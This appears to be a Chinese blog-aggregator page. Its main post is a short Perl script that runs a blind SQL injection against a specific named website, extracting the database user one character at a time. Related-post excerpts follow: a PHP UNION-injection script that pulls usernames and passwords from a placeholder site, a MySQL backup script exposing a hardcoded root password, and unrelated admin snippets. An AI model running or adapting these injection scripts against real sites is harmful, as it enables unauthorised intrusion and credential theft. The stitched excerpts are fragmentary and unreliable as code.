测试一个注入小脚本

 1 use warnings;
 2 use strict;
 3 use LWP::Simple;
 4 my @result;
 5 my $i=1;
 6 do{
 7     for(my $count=0;$count <=255;$count++){
 8         my $result = get("http://www.btc918.com//Chart/getJsonData?market=1‘ or (     select if(ascii(substr((select user()),$i,1))=$count,1,0))-- -");
 9         if($result =~ /120464662.8341/){
10                 print "OK!\n";
11                 print chr($count),"\n";
12                 push @result,chr($count);
13                 last;
14         }
15         print "Not $count \n";
16     }
17     $i++;
18 }while($i < 15);
19 print @result,"\n";

主要是猜测当前数据库名称

时间: 2024-11-06 06:26:14

测试一个注入小脚本的相关文章

写一个php小脚本辅助渗透测试

因为一个注入要爬行一些数据,然后写的一个小脚本,能写脚本来辅助渗透,也算是里程碑.哈哈哈 <?php $num = 1; while ($num <= 39) { $web_url = "http://www.xxx.com/shownews.asp?id=626%0AUNION%0ASELECT%0Atop%0A1%0A1,user_username,3,user_password,5,6%0Afrom%0A(select%0Atop%0A1%0Auser_username,use

MySQL备份脚本的一个简单小脚本

#!/bin/bash #记录备份的时间echo "-----"$(date +"%y-%m-%d %H:%M:%S")"-----" >> /data/backup_mysql/record.log #定义变量 MYUSER=rootMYPASSWORD=29749716#@HeiniaoSOCKET=/data/mysql/mysql.sockMYCMD="mysql -u $MYUSER -p$MYPASSWORD -

一个python小脚本——合并一个文件夹下的所有文本

#coding:utf8import sys,os def process(path): for f in os.listdir(path): fin = open(path+"/"+f,"r") print fin.read() fin.close() if __name__ == "__main__": process(sys.argv[1]) linux执行:

基于python一个分发小脚本

基于paramiko分发公钥到其他机器,有不足的地方还望见谅 #-*- coding: utf-8 -*- #!/usr/bin/python  import os import paramiko import threading data='ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvQfqvW1JjYhRVgqYjBCLsTWNx0q/X+IcHdATG0MvJ5Nrew08eoEiy4/rScsUiQaMLaIApTa0Smn5Yg9vP0Z4ESfqMEye

telnet小脚本

Shell学习之运维用的telnet小脚本 白羊IT关注0人评论1469人阅读2017-11-30 21:56:37 生活中经常遇到的一件事情我想是,领导给你一堆IP,让你去telnet测试下网络连通性,这时候你就需要写一个shell小脚本去高效的执行了.以下是我在生产环境上试验过的,不一定是最优的代码,当我想应该也够用了. 共有两种情况:第一种情况是每个IP的端口都不固定 IPs_Port.txt 存放的文件是 192.168.1.1 4949 192.168.2.3 9090 cat IPs

一个根据内存使用情况重启tomcat的小脚本

有一台服务器上部署了tomcat,随着时间的推移,内存消耗越来越大,所以写了一个小脚本配合crontab定时检测内存,不足的情况下重启tomcat. #!/bin/bash #tomcat restart:out of memory LOG=./restart_tomcat.log TOMCAT=/tomcat/bin/ TOMCATDIR=/tomcat echo"----------------------------" >> $LOG mem_total=$(free

一个计算的小脚本

[[email protected] cailu]# cat urfile 1 a2 b3 a1 d[[email protected] cailu]# awk '{a[$1]=a[$1]?a[$1]OFS$2:$2}END{for(i in a)print i,a[i]}' urfile 1 a d2 b3 a 一个计算的小脚本,布布扣,bubuko.com

用Python实现一个爬取XX大学电费通知的小脚本

内容简要 1分析网站 2简单爬取 3进阶自定义爬取 4保存进数据库 学校基础设施太差,宿舍电量过低提醒虽然贴在楼下,但是作为低头一族,经常忘记看提醒导致宿舍酣战时突然黑屏,为了避免这种尴尬的场景以及强化PY学习,我决定制作一个简单的爬虫. 首先我通过学校的微信公众号找到了一个十分隐蔽的查低电量提醒网站.它的界面是这样的: 手机适应的页面当然在电脑上会有一些崩=.=,但是不要介意,我们要的是功能.下面是查询到的界面 虽然看起来low而且经常不更新,但是它至少能用.于是我决定用它来制作低电量提醒查询

初步学习nodejs,业余用node写个一个自动创建目录和文件的小脚本,希望对需要的人有所帮助

初步学习nodejs,业余用node写个一个自动创建目录和文件的小脚本,希望对需要的人有所帮助,如果有bug或者更好的优化方案,也请批评与指正,谢谢,代码如下: 1 var fs = require('fs'); 2 var tel = [ 3 "1/2/4/6/a.tpl.html", 4 "1/2/4/7/9/c.tpl.html", 5 "1/3/5/8/b.tpl.html"]; 6 var demo = function (mulu)